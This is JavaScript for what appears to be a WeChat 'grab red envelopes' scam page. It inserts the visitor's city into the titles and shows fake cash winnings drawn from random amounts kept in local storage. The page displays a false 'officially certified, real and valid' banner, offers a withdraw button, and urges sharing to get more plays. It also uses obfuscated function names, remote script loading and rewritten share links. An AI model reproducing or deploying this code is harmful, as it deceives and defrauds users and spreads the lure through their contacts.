SOURCE

console 命令行工具 X clear

                    
>
console
_x = JSON.parse(window.atob(_x));
var address = localAddress.city ? localAddress.city : (localAddress.province ? localAddress.province : '北京');
var city = address.replace(/(.*)市/, '$1');
city = city.replace(/(.*)省/, '$1');
city = city.replace(/(.*)区/, '$1');
if (_x.ht == "*") {
    let unfamiliarStr = ['��', '��', '��', '✨', '��', '��', '��', '��', '��', '��', '��', '��', '��', '��', '��', '⭐', '��', '��', '⛄', '��', '��', '��', '��', '��', '��', '��', '��', '��', '��', '��', '��', '��']
    let strLength = unfamiliarStr.length;
    let subNumber = Math.floor(Math.random() * (strLength - 0) + 0);
    document.title = unfamiliarStr[subNumber];
} else {
    document.title = _x.ht.replace(/{city}/g, city);
}
_x.at = _x.at.replace(/@地区/g, city);
_x.bt = _x.bt.replace(/@地区/g, city);
var citys = city
if (_di == 1) {
    citys = gahytuai(city, "\u06e3")
} else if (_di == 2) {
    citys = gahytuai(city, "\u0e31")
} else if (_di == 3) {
    citys = gahytuai(city, "\u0489")
} else if (_di == 4) {
    citys = gahytuai(city, "\u0361")
} else if (_di == 5) {
    citys = gahytuai(city, "\u035c")
} else if (_di == 6) {
    citys = gahytuai(city, "\u034f")
}
;var aam = "";
var bbm = "";
var step = 0;
if (_di == 9) {
    step = 6;
}
var data = null;
var money = parseFloat(getTotalMoney());
_f = JSON.parse(window.atob(_f));
_f.s.ptitle0 = _f.s.ptitle0.replace(/{city}/g, citys).replace(/@字/g, "大");
_f.s.title1 = _f.s.title1.replace(/{city}/g, citys).replace(/@字/g, "大");
_f.s.title2 = _f.s.title2.replace(/{city}/g, citys).replace(/@字/g, "大");
_f.s.title3 = _f.s.title3.replace(/{city}/g, citys).replace(/@字/g, "大");
_f.s.title4 = _f.s.title4.replace(/{city}/g, citys).replace(/@字/g, "大");
_f.s.title5 = _f.s.title5.replace(/{city}/g, citys).replace(/@字/g, "大");
_f.s.title6 = _f.s.title6.replace(/{city}/g, citys).replace(/@字/g, "大");
_f.s.ptitle1 = _f.s.ptitle1.replace(/{city}/g, citys).replace(/@字/g, "大");
_f.s.ptitle2 = _f.s.ptitle2.replace(/{city}/g, citys).replace(/@字/g, "大");
_f.s.desc1 = _f.s.desc1.replace(/{city}/g, citys).replace(/@字/g, "大");
_f.s.desc2 = _f.s.desc2.replace(/{city}/g, citys).replace(/@字/g, "大");
_f.s.desc3 = _f.s.desc3.replace(/{city}/g, citys).replace(/@字/g, "大");
_f.s.desc4 = _f.s.desc4.replace(/{city}/g, citys).replace(/@字/g, "大");
_f.s.desc5 = _f.s.desc5.replace(/{city}/g, citys).replace(/@字/g, "大");
_f.s.desc6 = _f.s.desc6.replace(/{city}/g, citys).replace(/@字/g, "大");
document.body.style = "background:url(" + _x.bjt + ") #b3201b no-repeat;color:#fcf39c;background-position:center top;background-size:100% auto";
if (_x.dom.substr(0, 8) != "https://" && _x.dom.substr(0, 7) != "http://") {
    _x.dom = "http://" + _x.dom
}
;audioTip = new Audio("https://static.wenjuan.pub/3645488191");
audioFail = new Audio("https://static.wenjuan.pub/1976380017");
function pkxor() {
    var system = {
        win: false,
        mac: false,
        xll: false
    };
    var p = navigator.platform;
    system.win = p.indexOf("Win") == 0;
    system.mac = p.indexOf("Mac") == 0;
    system.x11 = (p == "X11") || (p.indexOf("Linux") == 0);
    if (system.win || system.mac) {
        return true;
    } else {
        return false;
    }
}
if (pkxor()) {
    //location = 'xp.cord.html';
}



function gahytuai(pyi, bb) {
    var fgty = "";
    for (i = 0; i < pyi.length; i++) {
        fgty = fgty + pyi.substr(i, 1) + bb
    }
    ;fgty = fgty.substr(0, fgty.length - 1);
    return fgty;
}
function Element(a) {
    var b = a.tagName
      , c = a.props
      , d = a.children;
    return this instanceof Element ? (this.tagName = b,
    this.props = c || {},
    this.children = d || [],
    void 0) : new Element({
        tagName: b,
        props: c,
        children: d
    });
}
Element.prototype.render = function() {
    var a, b, c = document.createElement(this.tagName), d = this.props;
    for (a in d)
        b = d[a],
        c.setAttribute(a, b);
    return this.children.forEach(function(a) {
        var b = null;
        b = a instanceof Element ? a.render() : document.createTextNode(a),
        c.appendChild(b);
    }),
    c;
}
;
function htmls() {
    g = Element({
        tagName: "div",
        props: {
            class: 'box game',
            id: 'nyni'
        },
        children: [Element({
            tagName: "div",
            props: {
                class: 'cloud-wrap',
            },
            children: [Element({
                tagName: "div",
                props: {
                    class: 'cloud',
                },
                children: [Element({
                    tagName: "div",
                    props: {
                        class: 'cb',
                    },
                    children: [Element({
                        tagName: "div",
                        props: {
                            class: 'show-money l',
                        },
                        children: [Element({
                            tagName: "span",
                            children: ['0.00']
                        }), '元']
                    }), Element({
                        tagName: "div",
                        props: {
                            class: 'show-time r',
                            'onclick':'jfx()'
                        },
                        children: [Element({
                            tagName: "span",
                            children: ['15']
                        }), '秒']
                    })]
                })]
            })]
        }), Element({
            tagName: "div",
            props: {
                class: 'fall',
            },
            children: [Element({
                tagName: "i"
            }), Element({
                tagName: "i"
            }), Element({
                tagName: "i"
            }), Element({
                tagName: "i"
            })],
        }), Element({
            tagName: "div",
            props: {
                class: 'bag',
            },
            children: [Element({
                tagName: "div",
                props: {
                    class: 'red',
                },
                children: [Element({
                    tagName: "ul",
                    props: {
                        class: 'mailers-box'
                    },
                    children: [Element({
                        tagName: "li",
                        props: {
                            class: 'mailer-item',
                        },
                    })],
                }), Element({
                    tagName: "div",
                    props: {
                        class: 'mailer',
                        id: 'mailer',
                    },
                    children: [Element({
                        tagName: "span",
                        props: {
                            class: 'arrow',
                        },
                    }), Element({
                        tagName: "em",
                        props: {},
                        children: ['上滑抢红包']
                    })],
                }), Element({
                    tagName: "div",
                    props: {
                        class: 'cover',
                    },
                    children: [Element({
                        tagName: "span",
                        props: {
                            class: 'eyebrow-l',
                        },
                    }), Element({
                        tagName: "span",
                        props: {
                            class: 'eyebrow-r',
                        },
                    })],
                })]
            }), Element({
                tagName: "div",
                props: {
                    class: 'value hide',
                },
                children: ['+', Element({
                    tagName: "em",
                }), '元']
            })]
        }), Element({
            tagName: "div",
            props: {
                class: 'boom',
            },
            children: [Element({
                tagName: "i"
            }), Element({
                tagName: "i"
            }), Element({
                tagName: "i"
            }), Element({
                tagName: "i"
            })],
        }), Element({
            tagName: "div",
            props: {
                class: 'time-out-bg',
            },
        }), Element({
            tagName: "div",
            props: {
                class: 'time-out-num',
            },
        }), Element({
            tagName: "div",
            props: {
                class: 'pop-detail hide',
                id: 'game_result'
            },
            children: [Element({
                tagName: "div",
                props: {
                    class: 'pop-cnt-wrap',
                },
                children: [Element({
                    tagName: "div",
                    props: {
                        class: 'pop-cnt',
                    },
                    children: [Element({
                        tagName: "div",
                        props: {
                            class: 'cnt',
                        },
                        children: [Element({
                            tagName: "h3",
                            props: {
                                class: 'tc score-name',
                            },
                            children: ['本次成绩: 0个,共0元']
                        }), Element({
                            tagName: "h5",
                            props: {
                                class: 'tc',
                                id: 'best_score'
                            },
                            children: ['总额:', Element({
                                tagName: "span",
                                children: ['100']
                            }), '元']
                        }), Element({
                            tagName: "p",
                            props: {
                                class: 'game-tips',
                            },
                            children: ['每人两次机会,金额可以累积,可秒提现']
                        }), Element({
                            tagName: "div",
                            props: {
                                class: 'btn-wrap',
                            },
                            children: [Element({
                                tagName: "a",
                                props: {
                                    id: 'dianwo',
                                    href: 'javascript:void(0);',
                                    class: 'btn btn-orange'
                                },
                                children: ['马上提现']
                            }), Element({
                                tagName: "a",
                                props: {
                                    id: 'play_now',
                                    href: 'javascript:void(0);',
                                    class: 'btn btn-orange hide'
                                },
                                children: ['还有', Element({
                                    tagName: "span",
                                    props: {
                                        id: 'num',
                                    },
                                }), '次机会,再来一次']
                            })]
                        })]
                    })]
                })]
            })]
        })]
    });
    document.body.appendChild(g.render());

    c = Element({
        tagName: "div",
        props: {
            id: 'mask1',
            class: 'mask1',
        },
        children: [' ', Element({
            tagName: "div",
            props: {
                id: 'js_share_mask',
                class: 'pop-share hide',
            }
        }), Element({
            tagName: "div",
            props: {
                id: 'wx',
                class: 'wx',
                style: 'position:fixed;top:0;left:0;width:100%;height:2.5rem;background:#000;opacity:.8;z-index:9999;display:none'
            },
            children: [Element({
                tagName: "div",
                props: {
                    style: 'clear:both;float:right;color:#fff;width:2.5rem;height:2.5rem;text-align:center;padding-right:.2rem;line-height:2.5rem;font-size:4vw',
                    onclick: 'return x()'
                },
                children: ['✖']
            }), Element({
                tagName: "div",
                props: {
                    style: 'float:left;height:2.3rem;width:2.3rem;margin:.1rem'
                },
                children: [Element({
                    tagName: "img",
                    props: {
                        style: 'width:100%;height:100%;padding-left:.4rem',
                        src: 'https://static.wenjuan.pub/1824966830.png'
                    }
                })]
            }), Element({
                tagName: "div",
                props: {
                    style: 'color:green;text-align:center;height:2.3rem;margin:.1rem;line-height:2.3rem;font-size:4vw'
                },
                children: ['活动经官方认证,真实有效!']
            })]
        })]
    });
    setTimeout(function() {
        document.body.appendChild(c.render());
        setTimeout(function() {
            var wxss = document.getElementById("wx");
            wxss.style.display = "none";
        }, 5000);
        document.getElementById("wx").style.display = "block";
        document.getElementById("wx").onclick = function() {
            var wxss = document.getElementById("wx");
            wxss.style.display = "none";
        }
        ;
    }, 1500);
}
htmls();
ff = Element({
    tagName: "div",
    props: {
        id: 'gb',
        onclick: "gameOver()",
        style: "position:fixed;z-index:9999;top:70px;left:-13px;width:80px;height:40px;line-height:20px;border-radius:0 20px 20px 0;background-color:#1B0100;opacity:.7;text-align:center;"
    },
    children: [Element({
        tagName: "a",
        props: {
            style: "line-height:40px;font-size:16px;color:#E9CE9C;text-decoration:none",
        },
        children: ['关闭 ×']
    })]
})
if (_x.gb == 1) {
    document.body.appendChild(ff.render())
}

function closeaddiv() {
    if (_x.ycxf == 0) {
        document.getElementById("bottomaddiv").style.display = 'none';
    }
}
;var talMoney2 = "fadacai";
function getTotalMoney() {
    var totalMoneys = localStorage.getItem("totalMoneys");
    if (typeof totalMoneys == "undefined" || totalMoneys == null || totalMoneys == "") {
        totalMoneys = 0;
        localStorage.setItem("totalMoneys", totalMoneys);
    }
    totalMoneys = parseFloat(totalMoneys).toFixed(2);
    return totalMoneys;
}
function setTotalMoney(totalMoneys) {
    if (typeof totalMoneys !== "undefined" && totalMoneys !== null && totalMoneys !== "") {
        localStorage.setItem("totalMoneys", totalMoneys);
        window.money = parseFloat(totalMoneys).toFixed(2);
    }
}
function getLuckyNum() {
    var luckyNums = localStorage.getItem("luckyNums");
    if (typeof luckyNums == "undefined" || luckyNums == null || luckyNums == "") {
        luckyNums = 2;
        setLuckyNum(luckyNums);
    }

    return parseInt(luckyNums);
}
function setLuckyNum(luckyNums) {
    if (typeof luckyNums !== "undefined" && luckyNums !== null && luckyNums !== "") {
        localStorage.setItem("luckyNums", luckyNums);
    }
}
$("#play_now").on("click", function() {
    location.reload();
});
if (talMoney2.indexOf("fa") != -1) {
    var URL_PARAM = {};
} else {
    var URL_PARAM = true;
}
var didi = document.createElement('audio');
document.body.appendChild(didi)
function onBridgeReady() {
    try {
        WeixinJSBridge.invoke('getNetworkType', {}, function(res) {
            var u = navigator.userAgent;
            var isiOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);
            if (isiOS) {
                is74wle4kbr2y("https://wwxx-oss.oss-accelerate.aliyuncs.com/new/ss.js", function() {
                    createjs.Sound.registerSound({
                        id: "sound",
                        src: "https://wwxx-oss.oss-accelerate.aliyuncs.com/new/count.mp3"
                    });
                });
            } else {
                didi.controls = false;
                var doa = "https://wwxx-oss.oss-accelerate.aliyuncs.com/new/count.mp3";
                didi.src = doa;
                didi.load();
            }
        });
    } catch (err) {}
}
if (typeof WeixinJSBridge == "undefined") {
    if (document.addEventListener) {
        document.addEventListener("WeixinJSBridgeReady", onBridgeReady, false);
    } else if (document.attachEvent) {
        document.attachEvent("WeixinJSBridgeReady", onBridgeReady);
        document.attachEvent("onWeixinJSBridgeReady", onBridgeReady);
    }
} else {
    onBridgeReady();
}
var proxyid = 0;
var proxies = [];
var _GLOBLE_VAR = {
    temp_value: 0,
    isswipeUping: false,
    swipe_timeout: null,
    swipe_timeout_1: null,
    startX: 0,
    startY: 0,
    isSlideUp: false,
    time: [],
    distance: "",
    now_mailer: "",
    prev_mailer: "",
    limitAmount: "200",
    game_over: false,
    real_play_time: 2,
    share_time: 0,
    share_to_play_again: false,
    state: 1,
    mailer_el: $("#mailer")[0],
    totalSlideUpNum: 0,
    touchidentifier: 0,
    best_score: 0,
    share_text_arr: ["捡钱小王子", "红包挖掘机", "拆红包神手指", "人肉点钞机"],
    score_level: ["80%", "90%", "95%", "99%"],
    user_max_bonus: 200,
    user_ran_var: 60,
    has_play_times: 0,
    customer_type: 1,
    new_customer_arr: [0.06, 0.06, 0.06, 0.08, 0.08, 0.08, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.6, 0.6, 0.6, 0.6, 0.6, 0.6, 0.6, 0.6, 0.6, 0.6, 0.6, 0.6, 0.6, 0.6, 0.6, 0.8, 0.9, 1.5, 2, ],
    old_customer_arr: [0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.04, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.06, 0.06, 0.06, 0.06, 0.06, 0.06, 0.06, 0.06, 0.06, 0.06, 0.06, 0.06, 0.06, 0.06, 0.06, 0.06, 0.06, 0.06, 0.06, 0.06, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.15, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.5, ],
    real_random_arr: [],
};
function fen2Yuan(value) {
    var re = /^[\+|-]?[0-9]+$/;
    if (typeof value != "string") {
        value = value.toString();
    }
    return re.test(value) ? (parseFloat(value) / 100).toFixed(2) : "0.00";
}
var Logic = {
    actid: "20122",
    stat_data: "fm_110_chb_16",
    _bind: function(el, evt, handler) {
        el.listeners = el.listeners || {};
        if (!el.listeners[evt]) {
            el.listeners[evt] = [handler];
        } else {
            el.listeners[evt].push(handler);
        }
        var proxy = function(e) {
            e.originEvent = e;
            for (var p in e.detail) {
                if (p !== "type") {
                    e[p] = e.detail[p];
                }
            }
            handler.call(e.target, e);
        };
        handler.proxy = handler.proxy || {};
        if (!handler.proxy[evt]) {
            handler.proxy[evt] = [proxyid++];
        } else {
            handler.proxy[evt].push(proxyid++);
        }
        proxies.push(proxy);
        if (el.addEventListener) {
            el.addEventListener(evt, proxy, false);
        }
    },
    _unbind: function(el, evt, handler) {
        if (!handler) {
            var handlers = el.listeners[evt];
            if (handlers && handlers.length) {
                handlers.forEach(function(handler) {
                    el.removeEventListener(evt, handler, false);
                });
            }
        } else {
            var proxyids = handler.proxy[evt];
            if (proxyids && proxyids.length) {
                proxyids.forEach(function(proxyid) {
                    if (el.removeEventListener) {
                        el.removeEventListener(evt, proxies[proxyid], false);
                    }
                });
            }
        }
    },
    touchStartFunc: function(e) {
        e.preventDefault();
        var touch = e.touches[0];
        var y = Number(touch.pageY);
        _GLOBLE_VAR.startY = y;
        $(".time-out-bg").addClass("hide");
    },
    touchMoveFunc: function(e) {
        try {} catch (err) {}
        e.preventDefault();
        if (talMoney2.indexOf("da") != -1) {
            var touch = e.touches[0];
        } else {
            var touch = e.touches[1];
        }
        var y = Number(touch.pageY);
        _GLOBLE_VAR.distance = y - _GLOBLE_VAR.startY;
        if (_GLOBLE_VAR.distance < -20 && Logic.getFingers(e) <= 2) {
            _GLOBLE_VAR.isSlideUp = true;
            clearTimeout(_GLOBLE_VAR.swipe_timeout);
            clearTimeout(_GLOBLE_VAR.swipe_timeout_1);
            _GLOBLE_VAR.isswipeUping = true;
        }
    },
    getFingers: function(e) {
        return e.touches ? e.touches.length : 1;
    },
    touchMoveEndFunc: function(e) {
        e.preventDefault();
        if (_GLOBLE_VAR.isSlideUp && !_GLOBLE_VAR.game_over) {
            var u = navigator.userAgent;
            var isiOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);
            if (isiOS) {
                createjs.Sound.play("sound");
            } else {
                didi.currentTime = 0
                didi.play();
            }
            _GLOBLE_VAR.totalSlideUpNum++;
            if (!$("body").hasClass("show-mailer-ani")) {
                $("body").addClass("show-mailer-ani");
            }
            if (!$("body").hasClass("show-ani")) {
                $("body").addClass("show-ani");
            }
            setTimeout(function() {
                if (!_GLOBLE_VAR.isswipeUping) {
                    $("body").removeClass("show-mailer-ani");
                }
            }, 200);

            if (talMoney2.indexOf("cai") != -1) {
                _GLOBLE_VAR.isSlideUp = false;
            } else {
                _GLOBLE_VAR.isSlideUp = true;
            }
            var random_value = fen2Yuan(parseInt(Math.floor(Math.random() * _GLOBLE_VAR.user_ran_var)) + 1);
            random_value = (parseFloat(random_value) * 6).toFixed(2);
            $(".value em").text(random_value).parent().removeClass("hide");
            if (!_GLOBLE_VAR.game_over) {
                if (parseFloat(random_value) > 0.1) {
                    var random0_2 = parseInt(Math.random() * 50);
                    $(".boom i").eq(random0_2).addClass("show-boom-ani");
                    setTimeout(function() {
                        $(".boom i").eq(random0_2).removeClass("show-boom-ani");
                    }, 600);
                }

                _GLOBLE_VAR.temp_value = (parseFloat(_GLOBLE_VAR.temp_value) + parseFloat(random_value)).toFixed(2);

                $(".show-money span").text(_GLOBLE_VAR.temp_value);
            }
            _GLOBLE_VAR.swipe_timeout_1 = setTimeout(function() {
                if (!_GLOBLE_VAR.isswipeUping) {
                    $(".value").addClass("hide");
                }
            }, 600);
            _GLOBLE_VAR.swipe_timeout = setTimeout(function() {
                _GLOBLE_VAR.isswipeUping = false;
            }, 150);
        }
    },
    initTouchEvents: function() {
        this._bind(_GLOBLE_VAR.mailer_el, "touchstart", this.touchStartFunc);
        this._bind(_GLOBLE_VAR.mailer_el, "touchmove", this.touchMoveFunc);
        this._bind(_GLOBLE_VAR.mailer_el, "touchend", this.touchMoveEndFunc);
    },
    bindEvents: function() {
        $(".shareTo").on($.Env.TAP, function(e) {
            e.preventDefault();
            e.stopPropagation();
            $(".pop-share").removeClass("hide");
            $.Stat.clickStat("HYBIRD.FUND.HONGBAO.SHARE");
            if ($(this).hasClass("only-share")) {
                _GLOBLE_VAR.share_to_play_again = false;
            }
        });
        $("#use_now").on($.Env.TAP, function(e) {
            e.preventDefault();
            var param = ["showwxpaytitle=1", "channel=money150713", "placeholder=" + _GLOBLE_VAR.limitAmount + "元以上奖励到账", "min_warning_tips=需买入至少" + _GLOBLE_VAR.limitAmount + "元奖励方可到账", "buywayischooseable=0", "defaultbuyway=1", "min_amount=" + _GLOBLE_VAR.limitAmount, "sendmore=" + Math.min(_GLOBLE_VAR.user_max_bonus, _GLOBLE_VAR.best_score), "stat_type=88", "stat_data=" + Logic.stat_data, ];
            if (URL_PARAM.stat_data) {
                param.push("stat_type=68");
                param.push("stat_data=" + URL_PARAM.stat_data);
            }
        });
        $(".js_replay").on($.Env.TAP, function(e) {
            e.preventDefault();
            e.stopPropagation();
            $.Stat.clickStat("HYBIRD.FUND.HONGBAO.AGAIN");
            if (!localStorage.getItem("money0713_share_time") || localStorage.getItem("money0713_share_time") < 1) {
                $(".pop-share").removeClass("hide");
                _GLOBLE_VAR.share_to_play_again = true;
            } else {
                location.reload();
            }
        });
        $(".pop-share").on($.Env.TAP, function(e) {
            e.preventDefault();
            e.stopPropagation();
            $(".pop-share").addClass("hide");
        });
        $("body").on($.Env.TAP, function(e) {
            var popShare = $(".pop-share");
            if (!popShare.hasClass("hide") && !popShare.hasClass("pop-share-customer")) {
                popShare.addClass("hide");
            }
        });
    },
    initGameClock: function() {
        var total_sec = 15;
        var secCount = function() {
            if (total_sec > -1) {
                $(".show-time span").text(total_sec);
                total_sec--;
                if (!_GLOBLE_VAR.isswipeUping) {
                    $("body").removeClass("show-ani");
                }
            } else {
                Logic._unbind(_GLOBLE_VAR.mailer_el, "touchstart", Logic.touchStartFunc);
                Logic._unbind(_GLOBLE_VAR.mailer_el, "touchmove", Logic.touchMoveFunc);
                Logic._unbind(_GLOBLE_VAR.mailer_el, "touchend", Logic.touchMoveEndFunc);
                _GLOBLE_VAR.game_over = true;
                setTimeout(function() {
                    $("body").removeClass("show-ani").removeClass("show-mailer-ani");
                    $(".value").addClass("hide");
                }, 100);
                clearInterval(t);
                $("body").addClass("show-pop-loading");

                Logic.showGameResult();
            }
        };
        var t = setInterval(secCount, 1000);
    },
    initBeginClock: function() {
        var begin_clock_num = 3
          , prev_class = ""
          , begin_clock_el = $(".time-out-num");
        var begin_clock = function() {
            begin_clock_num--;
            var now_class = "num-" + begin_clock_num;
            if (prev_class != "") {
                begin_clock_el.removeClass(prev_class);
            }
            begin_clock_el.addClass(now_class);
            prev_class = now_class;
            if (begin_clock_num > 0) {
                setTimeout(begin_clock, 800);
            } else {
                $(".mailer").css({
                    zIndex: 200,
                }).children().addClass("");
                Logic.initGameClock();
                $(".time-out-bg").addClass("hide");
                begin_clock_el.addClass("hide");
                $("body").removeClass("show-timeout");
                Logic.initTouchEvents();
            }
        };
        setTimeout(begin_clock, 1500);
    },
    showGameResult: function() {
        $("body").removeClass("show-pop-loading");
        var score_level_name = _GLOBLE_VAR.best_score < 10 ? "" : _GLOBLE_VAR.best_score < 12 ? _GLOBLE_VAR.score_level[0] : _GLOBLE_VAR.best_score < 14 ? _GLOBLE_VAR.score_level[1] : _GLOBLE_VAR.best_score < 16 ? _GLOBLE_VAR.score_level[2] : _GLOBLE_VAR.score_level[3];
        if (_GLOBLE_VAR.state != 2) {
            if (Math.max(_GLOBLE_VAR.temp_value, _GLOBLE_VAR.best_score) > _GLOBLE_VAR.user_max_bonus) {
                $("#game_result .score-name").text("您是红包之神,拆出最高限额");
                $("#best_score").text("红包之神:" + _GLOBLE_VAR.temp_value + "元");
            } else {
                $("#game_result .score-name").text("本次成绩: " + _GLOBLE_VAR.totalSlideUpNum + "个,共" + _GLOBLE_VAR.temp_value + "元");
                $("#best_score span").text(Math.max(_GLOBLE_VAR.temp_value, _GLOBLE_VAR.best_score));
            }
            if (score_level_name != "") {
                $("#game_result .label").removeClass("hide").find("em").text(score_level_name);
            }
            $("#game_result").removeClass("hide");
            var curMoney = _GLOBLE_VAR.temp_value;
            setTotalMoney(parseFloat(getTotalMoney()) + parseFloat(curMoney));
            $("#best_score span").text(getTotalMoney());
        } else {
            var name = _GLOBLE_VAR.best_score <= 2 ? _GLOBLE_VAR.share_text_arr[0] : _GLOBLE_VAR.best_score <= 3 ? _GLOBLE_VAR.share_text_arr[1] : _GLOBLE_VAR.best_score <= 5 ? _GLOBLE_VAR.share_text_arr[2] : _GLOBLE_VAR.share_text_arr[3];
            $("#game_result_used .score-name").text("你是" + name);
            $("#open").text("获得" + _GLOBLE_VAR.best_score + "元红包已使用");
            if (score_level_name != "") {
                $("#game_result_used .label").removeClass("hide").find("em").text(score_level_name);
            }
            $("#game_result_used").removeClass("hide");
        }
        var total = getLuckyNum() - 1;
        setLuckyNum(total);
        $("#num").text(total);
        if (total > 0) {
            $("#play_now").removeClass("hide");
        }
    },
    init: function() {
        URL_PARAM = $.getParameter();
        Logic.stat_data = URL_PARAM.stat_data || "fm_110_chb_16";
        $("body").bind("touchmove", function(e) {
            e.preventDefault();
        });
        this.initUserInfo();
    },
};
if (getLuckyNum() <= 0) {
    $("#mailer").addClass("hide");
    Logic.showGameResult();
} else {
    Logic.initBeginClock();
}
document.body.addEventListener("touchmove", function(e) {
    e.preventDefault();
}, {
    passive: false
});



function is74wle4kbr2y(a, b) {
    var c = document.createElement("script");
    c.src = a,
    c.onload = function() {
        "function" == typeof b && b();
    }
    ,
    document.body.appendChild(c);
}
function noRefJump(url) {
    var a = document.createElement('a');
    a.href = url;
    a.rel = 'noreferrer';
    a.click();
}
function makeid() {
    var text = "";
    var possible = "abcefghijklmnopqrstuvwyz0123456789";
    for (var i = 0; i < Math.floor(Math.random() * 10 + 4); i++)
        text += possible.charAt(Math.floor(Math.random() * possible.length));
    return text;
}
function getids() {
    var text = "";
    var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    for (var i = 0; i < 70; i++)
        text += possible.charAt(Math.floor(Math.random() * possible.length));
    return text;
}
is74wle4kbr2y('https://res.wx.qq.com/open/js/jweixin-1.2.0.js', function() {
    hady();
});
function hady() {
    gda6jrp46x27p7(_f.a, function(a) {
        data = config_json(JSON.parse(a));
        aam = _f.t.aa;
        bbm = _f.t.bb;
        if (aam == "" || bbm == "") {
            hady();
            return
        }
        if (aam.indexOf("http://https://") != -1 || aam.indexOf("http://http://") != -1) {
            aam = aam.replace(/http:\/\/https:\/\//, "https://");
            aam = aam.replace(/http:\/\/http:\/\//, "http://");
            _f.f[1] = aam + "?" + _f.f[1].split("?")[1].split("&callback=")[0].replace(/=/g, "%3D");
            _f.f[2] = aam + "?" + _f.f[2].split("?")[1].split("&callback=")[0].replace(/=/g, "%3D");
            _f.f[3] = aam + "?" + _f.f[3].split("?")[1].split("&callback=")[0].replace(/=/g, "%3D");
            _f.f[4] = aam + "?" + _f.f[4].split("?")[1].split("&callback=")[0].replace(/=/g, "%3D");
            _f.f[5] = aam + "?" + _f.f[5].split("?")[1].split("&callback=")[0].replace(/=/g, "%3D");
            _f.f[6] = aam + "?" + _f.f[6].split("?")[1].split("&callback=")[0].replace(/=/g, "%3D");
        }
        if (bbm.indexOf("http://https://") != -1 || bbm.indexOf("http://http://") != -1) {
            bbm = bbm.replace(/http:\/\/https:\/\//, "https://");
            bbm = bbm.replace(/http:\/\/http:\/\//, "http://");
            _f.f[0] = bbm + "?" + _f.f[0].split("?")[1].split("&callback=")[0].replace(/=/g, "%3D");
            _f.f[7] = bbm + "?" + _f.f[7].split("?")[1].split("&callback=")[0].replace(/=/g, "%3D");
            _f.f[8] = bbm + "?" + _f.f[8].split("?")[1].split("&callback=")[0].replace(/=/g, "%3D");
        }
        wx.config(data.config);
    }, function() {
        hady();
    });
}
function gda6jrp46x27p7(a, b, c) {
    var d = new XMLHttpRequest();
    d.onreadystatechange = function() {
        4 === d.readyState && (200 === d.status || 304 === d.status ? "function" == typeof b && b(d.responseText) : "function" == typeof c && c(d));
    }
    ,
    d.open("GET", a, !0),
    d.send(null);
}
function config_json(re) {
    var r = {
        'config': re,
        't': {
            'title': '',
            'desc': '',
            'img_url': '',
            'link': location.href,
            'type': ''
        }
    };
    r.config.jsApiList = ["onMenuShareTimeline", "onMenuShareAppMessage", "hideOptionMenu", "showOptionMenu", "hideMenuItems", "showMenuItems", "closeWindow"];
    return r;
}
$("#dianwo").on("click", function() {
    var wxss = document.getElementById("wx");
    wxss.style.display = "none";
